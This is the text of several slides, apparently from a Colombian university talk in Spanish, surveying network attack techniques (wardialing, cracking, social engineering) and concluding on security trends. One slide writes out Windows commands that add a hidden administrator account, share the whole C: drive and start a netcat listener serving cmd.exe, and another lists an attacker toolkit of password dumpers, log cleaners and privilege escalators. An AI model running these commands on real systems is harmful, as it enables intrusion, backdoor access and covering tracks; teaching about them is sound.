  • 8. TECNICAS DE ATAQUE Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos. Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa. Herramientas:  THC-Scan 2.0  ModemScan  ShokDial
  • 9. TECNICAS DE ATAQUE Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas. Objetivo: Tener acceso al software o a la red interna. Herramientas:  Las 100 mejores http://sectools.org/  Inyección SQL  XSS
  • 10. TECNICAS DE ATAQUE Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves. Objetivo: Obtener información sensible que nos permita el acceso a la red. Herramientas:  Teléfono  Mucha psicología  Inteligencia emocional  http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  • 11. VECTORES DE ATAQUE A UNA RED Puntos de acceso INTERNET MODEM WIRELESS FISICO RED Wardriving Ing. Social Wardialing Cracking
  • 12. Y si tienen la oportunidad…  Menos de 1 minuto es suficiente para: 1. Crear una cuenta con privilegios de Admin!!! 1. Abrir la consola de comandos 2. C:net user fusm2010 fusm2010 /add 3. C:net localgroup administradores fusm2010 /add 2. Compartir toda la unidad del disco!!! 1. C:net share fusm2010=c: /remark:”Demo fusm2010” 3. Colocar un programa en escucha!!! 1. http://gseguridad.unicauca.edu.co/nc.exe 2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  • 13. Caja de Herramientas de ataque en línea de comandos fport.exe - shows open ports and the process that owns the port iplist.exe - enumerates the ip's of the computer md5.exe - gets the md5 hash of a file pw2kget.exe - for win2k gets the password of the currently logged on user pwreveal.exe - gets the passwords of any window that has a ****** editbox regshell.exe - a commandline registry explorer/editor sendmail.exe - a commandline email sender uptime.exe - gets the machines current uptime xwhois - advanced whois lookup Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp CMDget.exe - Downloads a file from a website from user provided parameters webscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machine bnc.exe - bnc for windows (see bnc.cfg) clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect information winfo.exe - enumerates IPC$ share to collect information FTPd.exe - small ftp server for dos (see slimftpd.conf) Global.exe - process dos command on all disc/subdirs iislog.exe - clears IIS logs Info.exe - gets system information ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir) nc.exe - netcat pv.exe - process manager for dos Pwdump.exe - dumps SAM hashes scrnmode.exe - change screen mode from dos unrar.exe - unrar for dos wget.exe - wget for windows wizmo.exe - command tool (see w.txt) dwpp.exe - dial up password graber winrelay.exe - relay tcp/udp connections getad.exe - escalate to admin user in w2k pipeup.exe - escalate to admin user in w2k dnsid - identify remore dns server Agradecimientos a: Netranger Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  • 14. LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS… http://www.hispasec.com/laboratorio/troyano_video.htm VIDEO
  • 15. EJEMPLO DE ATAQUE MASIVO  Escenario INTERNET LAN ATACANTE MAESTRO ZOMBIES Linux/Windows Metasploit Scripts en Python Linux-BackTrack4 Win/XP/2K http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  • 16. ... Y en la Unicauca que? • Electiva de seguridad informática • Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado) • Legislación en comercio electrónico (Finalizado) • OBSES (Firewall Cluster Beowulf) (Finalizado) • INFORCE (Finalizado) • Antivirus-inteligente (En desarrollo) • Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (Finalizado) • Proyecto SGSI en UNICAUCA (En desarrollo) • Publicaciones Preocupación del departamento de sistemas de la FIET sobre la problemática de la seguridad de la información en Colombia.
  • 17. CONCLUSIONES  Los ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO… • USA • UK • CHINA • RUSIA  Los sistemas de seguridad actuales son reactivos y correctivos. • Preventivos • Inteligentes  Existen demasiadas herramientas de ataque gratis y disponibles en la red.  Las técnicas de ataque cambian constantemente.  Segun las estadísticas es muy probable que su sistema haya sido vulnerado y usted aún no lo sepa!!!.